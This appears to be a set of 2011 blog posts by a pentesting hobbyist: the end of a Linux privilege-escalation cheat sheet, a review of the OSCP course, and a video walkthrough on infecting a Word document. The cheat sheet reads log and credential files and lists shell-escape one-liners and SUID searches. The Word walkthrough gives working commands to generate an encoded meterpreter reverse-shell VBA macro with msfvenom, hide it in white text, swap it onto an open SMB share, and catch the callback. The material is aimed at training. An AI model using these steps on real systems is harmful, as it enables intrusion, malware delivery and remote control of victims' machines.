# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

How are file-systems mounted?
mount
df -h

Are there any unmounted file-systems?
cat /etc/fstab

What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i $ -perm -4000 -o -perm -2000 $ -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null    # world-writeable folders
find / -perm -o+w -type d 2>/dev/null # world-writeable folders

find / -perm -o+x -type d 2>/dev/null # world-executable folders

find / $ -perm -o+w -perm -o+x $ -type d 2>/dev/null   # world-writeable & executable folders

Any "problem" files? Word-writeable, "nobody" files
find / -xdev -type d $ -perm -0002 -a ! -perm -1000 $ -print   # world-writeable files
find /dir -xdev $ -nouser -o -nogroup $ -print   # Noowner files

Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com

Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations
Is any of the above information easy to find?
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their plugins and web services
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net

Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm

Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

[Review] Pentesting With BackTrack (PWB) & Offensive Security Certified Professional (OSCP)

2011-07-28T13:11:00.013+01:00

The views and opinions expressed on this site are those of the author. Any claim, statistic, quote or other representation about a product or service should be verified with the seller, manufacturer or provider.

Up until a month or so ago, everything I've learnt was done by using various free resources online. Last month however, I became an "offsec" student. I enrolled on the "Pentesting with BackTrack" (PWB) course, currently version 3 (syllabus). After the lab time is over, the student has the option of sitting an exam. Upon passing the exam, the student is awarded an Offensive Security Certified Professional (OSCP) certificate. I now have that certificate =). This is my review of it all.

I wanted to do it for a few reasons:

The challenge. Unlike De-ICE, pwnOS, metaspoitable, Kioptrix, Holynix and all the other "boot to root" VMs & ISOs, this is a complete network. And then some. Not just a single machine.
The experience & knowledge. I don't claim to know it all. Far from it. The course covers a wide area of topics/subjects. As a result, it gave me the opportunity to "do" things that otherwise I couldn't. It also forced me to do certain activities I normally I wouldn't bother with, but after they were done, it felt very worth the while, mainly the "paper side" - the report.
The qualification. Its one thing doing it for fun and having a blog as a notepad, but potential employers would rather see a professional qualification on the CV. I haven't seen job requirements asking for it, but then again, I haven't been looking. I'm still a student, just hoping it will give me an extra edge when the time comes.
Support. Offensive Security funds backtrack. "Nice" to know that a certain percentage of the course fee helps an open source community project.

I am unable to share the specific details of the course due to the signed contract, so the Visio network map, which I spent hours on will never been seen again! The same goes for the methods of how to hack host "xyz".

We all learn differently and do so at different speeds. Also we all have different background experience and not everyone can put in the same about of time. Having now completed the course, I would say if you want to "just pass" the course and can put a good couple of hours in each day then you could get away with doing 30 days - at a push. However, if you want to take your time, learn it and (try to) "do it all", I would recommend 60+ days in the lab. I started off with 30 days, with the hope of cramming it all in as I could spend 8+ hours a day on it. In the end, it took me a solid 30 days in the labs (not including any of the exercises before the lab work), so I ended up extending it by 15 days. If I was to do it again, I'd opt for 60 days and pace myself better.

After looking at the syllabus, I set myself the goal of "getting into the admin network". Then it soon became, "getting a shell on every box I could", which soon turned into "getting 'root/system' on every box I could" - another reason why I extended my time. I ended up reaching all of these goals. This was a personal goal, it wasn't required, and you don't need to for the exam.

In the last couple of days of lab time, I was ready to throw in the towel. But I stuck with it and got there in the end, including the last hour, when I managed to root "sufferance" - a "beautifully evil box" in my eyes.

My next mistake was to book the exam so soon after the Lab time ended. As soon as I was kicked out of the lab, I realised how exhausting it had all been. The only small issue - I still had to write the lab report, which I'm sure most students hate doing. This was something completely new to me. It wasn't a high point of the course, but I'm glad I've done it. I haven't yet found my "style" of report so I'm planning on forcing myself to spend some time tweaking until I'm happy with it (I'll use the de-ice collection as the subjects).

I should of known better than to go into an exam feeling so tired. I spent all the morning trying to cross the t's and dot the i's in the report. Then dead on 3pm GMT the exam pack was in my inbox, with all the guidelines and rules, along with the new login details (and a new IP address to use, but I kept on using my lab IP. Oops!). The rules are "slightly" different compared to the lab. The likes of nessus and "similar" tools are completely forbidden. The systems with which you can attack using metasploit are limited and you can only use it once. Offsec defines "using metasploit" as launching exploits of any type - that includes getsystem. Allowing you to "scan, handle and listen", with it the rest of the time. I ended up not using my metasploit lifeline.

There were a few "starting" problems to begin with - but there was an admin on hand in the IRC channel (as there seems to always be!) - and we were up and working 40 minutes later.
Another mistake I made was not taking a break in the exam. I managed to get a couple of boxes within the first couple of hours, though due the weighting of the scoring system it "quite" wasn't enough to pass. I then spent a few hours trying to get into a box, which was just not working. I can't share the details of my issue, I was doing everything right and I'm still not fully sure what the problem was, but by magic it worked. By this time it was "silly o'clock" in the morning - too late to sleep.
With the last box, I managed to get a shell - though I had a good feeling how to get "system" (turns out I was correct), just couldn't do it in that frame of mind.
The exam report was better than the lab report, much shorter, had a template and it was "fresh"ish in my head.

Sent the PDF within 24 hours after the exam ended. Finally, I could sleep! Come the other side of the weekend, there was an email congratulating me. Best Monday morning mail I've got in a while. Job done.

There are a range of boxes, with mix operating systems giving you a chance to test out various skill sets which you learn along the way in simulated "real scenarios". "Sufference", by far with was the most "painful" box, without a question. I "finally" got root on it, with less than an hour to go. A phrase attached to offsec is "Try harder", and there are "awards" for doing so - such as access to Metasploit Pro.

Overall I really did enjoy the whole course. Everyone I've spoken to and during the course has said the same. Really is a great way to start exploring the depths of backtrack with all the tools and scripts it’s got to offer. I would recommend it, mainly for beginners & intermediates. If you're on a more advance level, you might want to give the course above a try, Cracking The Perimeter. I did have to save up for the course, as I paid for it out of my own pocket. It was worth it and if I had to option to do it again, I would. Don’t get me wrong, you can learn it all online for free, and I've done all the self-learning before - It's just knowing where to look to piece it all together yourself, it was "nice" having someone else doing it - which added an unknown surprise. I'm not too sure where I could fault the course. There were a couple of machines where the same single exploit would work - but from my understanding of pentesting, this is the case! These machines usually had multiple faults in them - so you could also hunt for a unique way in.

To the people thinking about doing it:
If you've been doing pentesting for 5+ years - it's probably not for you (also, this blog isn't for you!) The only reason would be either; if you want a "re-fresher/reminder", just want some letters to add to your CV or you have done everything else!

Even if you have never done anything along the lines of "port scan" before, then yes, this is for you. The only thing is, Offsec do recommend that before starting the course you have some background with Linux (e.g. know your way around the file system, how to use terminal, print "hello world" in python - that sort of thing) and networking (e.g. know what goes where and your TCPs packets from UDPs), and I would agree with them. I would add, try doing something like de-ice before signing up. My justifications:

There is a fair bit of self-learning on the course. Yes, there is PDF and video to start you off and guide you through the first few steps. However, you will need to learn (and try!) things for yourself.
(Slight) background knowledge can help. Can give you a rough idea of how do try something.
It's a very watered down sample.
You can take your time doing it (no lab time to worry about).

To students currently doing it:

Learn the materials (Read the PDF, watch the videos) BEFORE starting the labs. It's worth doing it.
Update/Check/Uninstall Programs before starting - Update the OS (BackTrack) & software (nmap, exploitdb, metasploit) once it is stable and you are in the labs, DON'T update again, as it could break something! Check the blog, forums and IRC (both Backtrack & offsec). Uninstall nessus. Best not to have the temptation of its power. Don't get me wrong - it is a great tool. But as you can't use it for the exam, you are better off learning to work without it.
Enumeration, more enumeration, and even more enumeration. There is a reason why you don't "get a shell" on anything for the first 6 chapters...
Pick off the low hanging fruit. Go after the "easy" ones first. If you see port "x" open, check "y", run "z" exploit. This helps you to get an idea of the network, collect usernames, passwords, hashes, etc.
Revert the machine BEFORE you attack - then scan it again (TCP & UDP). Once you have shell, netstat (a 'internal scan', if you will), and compare the results. Is there something running internally, which is blocked externally?
All the exploits are exploit-db or in the metsaploit frame work. However, sometimes you have "make the exploit fit".
Use a different port.
When you are "root/system" - have a look about. Desktop, Documents, Program files, Temp folders, Recent files, etc. There are some "juicy" files on some boxes. Not all. Some. Hint: Was it running MySQL? VNC? xyz? What are the usernames and or passwords for it!?
"Print Screen" as you go. Also copy & paste the konsole/terminal output too. It will help you down the line. More than you think.
Try harder. It can be done....

I would like to thank the offsec team for allowing the course to happen as well as the people which gave me support throughout it all. Thank you.

Update (2011-11-08):
One of the features of been an Offsec Student is having access to their hash cracking service, 'crackpot'. However, I personally got a higher success rate using:

If you are looking for some background reading before starting the course, I would recommend looking at:

[Site News] July 2011

2011-07-27T11:15:00.001+01:00

As I've been hiding under a rock as of late, I thought I would check in and explain what's on my "to do" list to try and make up for the lack of posts. Hopefully, over the next few weeks:

I've got 15-ish videos in the works, ready to be recorded ...and on that note...
Not far off the 50th video. I've got something in mind for it =)
I'm long overdue with releasing updates for a couple of scripts (fakeAP_pwn & wiffy to name a few), as well as a few new ones.
I've also been bouncing a few ideas for a future project,and, as a result a couple of people are on board to give a hand for "bigger" things. When the time right, I'll ask for more help - I need to get a "framework/structure" in place first. More details at a later date!

~g0tmi1k

[Video] Metasploit Vs Microsoft Office

2011-06-05T23:32:00.005+01:00

Links
Watch video on-line: http://blip.tv/g0tmi1k/metasploit-vs-microsoft-office-5241818
Download video: http://mediafire.com/?cw0do9o1hv8wpg0

Brief Overview
Following on from the Adobe Reader post, another very common document format is Microsoft's Office Word (.doc). This screencast demonstrates how embedding an evil 'macro' into the document can lead to compromising the target's computer.

A macro is an 'automated shortcut' to repeat tasks, in this case, to generate a meterpreter payload and connect back to the attacker. Even though the payload can be encoded to by-pass anti-virus, Microsoft Word still could block it depending on the macro security level.

To infect the target, the attacker scans the network and finds an open shared folder, which they have read & write access to. Upon viewing the contents of the folder, the attacker notices a Word Document. However, presenting the infected file could be done a number of different ways, such as emailing the target instead of scanning & replacing.

What do I need?
    * Metasploit – Download here. *Can be found on BackTrack 5.*
    * Microsoft Office - Can be bought from the online office store
    * Nmap - Download here. *Can be found on BackTrack 5.*
    * Samba - Download here. *Can be found on BackTrack 5.*
    * The attacker remotely controlled a 'test machine' using tightvnc which can be found on BackTrack 5. Download here.

Method
   * Scan network for active hosts (nmap)
   * Scan host for open ports (nmap)
   * Scan for any available shares (Samba)
   * Mount shared folder & view contents of it (Samba)
   * Copy document onto another (Windows) machine. (Samba)
   * Create macro & embed the payload (Metasploit)
   * Try & hide the 'modifications' (Office)
   * Replace the original document with the infected version (Samba)
   * Wait for target to open the file
   * Game Over

Commands:

apt-get install smbfs 
nmap 192.168.0.* -n -sn
nmap 192.168.0.105 -T5
smbclient -L \\192.168.0.105 -N
mkdir /mnt/shared
smbmount //192.168.0.105/Documents /mnt/shared -o rw
cd /mnt/shared && ls -l

mkdir ../vnc
smbmount //192.168.0.105/write /mnt/vnc -o rw
cp SuperSecretStuff.doc ../vnc/

ifconfig eth0   #hostname -I
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 -e shikata_ga_nai -i 3 -f vba > ../vnc/vba.txt

vncviewer 192.168.0.124
Notepad -> Open -> vba.txt
Microsoft Word -> Tools -> Macro -> Virtual Basic Editor
   Insert -> Module -> *Paste first half* -> Close
Microsoft Word -> Page break -> *Paste second half* -> Font Size: 1 -> Font Colour: White -> Save -> Close

cp ../vnc/SuperSecretStuff.doc ./
clear

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 E

Walk-through
As the target has 'learnt their lesson' from 'new' opening email attachments from 'unknown' people, the attacker chooses to replace a 'trusted' file.

The attacker has already connected to the network and to starts to scan the network to see if there are any active hosts currently connected. After locating the target, the attacker scans the target to see which ports they have that are open. The results of the port scan shows that the target could be sharing a folder on the network. The attacker proceeds by searching for shared resources. The attacker attempts to access a shared folder as a guest, and when prompted for any credentials, leaves them blank. The attacker gets lucky and has access to an open & writeable folder! After listing the contents of the folder, notices it has a document in it...

Before the attacker clones the document, they mount a shared folder on a 'test machine' which they control. The reason for this is because the easiest way to inject a VBA macro is to use 'Microsoft Office' itself! The attacker then copies the targets document to the test machine.

Afterwards, the attacker generates the VBA macro, which will be injected into the cloned documents. When creating the macro, the attacker chooses to 'encode' the payload, which 'helps' bypass anti-virus - however this isn't essential as there isn't any installed!

Once the macro has been transferred to the test machine, the attacker remotely connects to the machine to control it. The first stage of the infected is to create a macro and place the first piece of the code which was generated into it. The second piece of code goes into the document itself. As having the code is very visible, the attacker decides to use the smallest font, therefore taking up the least amount of space. By setting the text colour to white, this is the same as the background colour that causes the text to appear to be invisible. The document is then saved and replaced over the original.

The attacker then sits back & relaxes until the target opens the 'new infected' document... which the target soon does =). However! Depending on Microsoft's Word security level, either the user is presented with a warning message asking to enable or disable macros, doesn't open the document at all or opens without question! *As shown in the video*.

Notes:
    * This is my first video using BackTrack 5, by default KDE has semi-transparent konsole window. This caused 'poor' results when encoding.
    * Camtasia didn't record the VNC session that well, hence why there was a bit of lag in places.
    * Blip.TV has recently had a makeover and has updated their internal system for encoding. I believe the videos are now encoded at a lower quality, compared to previously uploaded.
    * In the current release of metasploit, I created a link to 'msfvenom' before recording by doing: ln -s /opt/framework3/msf3/msfvenom /usr/local/bin/msfvenom. Hopefully this will be fix/updated soon.
    * Before hand, I had instlaled smbfs. This is missing from the video, however you just need to run, apt-get install smbfs

Song: Lazee Feat. Neverstore - Hold On (Matrix Futurebound Terrace Tantrum Remix)

Video length: 5:39
Capture length: 10:04

Blog Post: http://g0tmi1k.blogspot.com/2011/06/video-metasploit-vs-microsoft-office.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-5-videos/43652-%5Bvideo%5D-metasploit-vs-microsoft-office.html#post204397

~g0tmi1k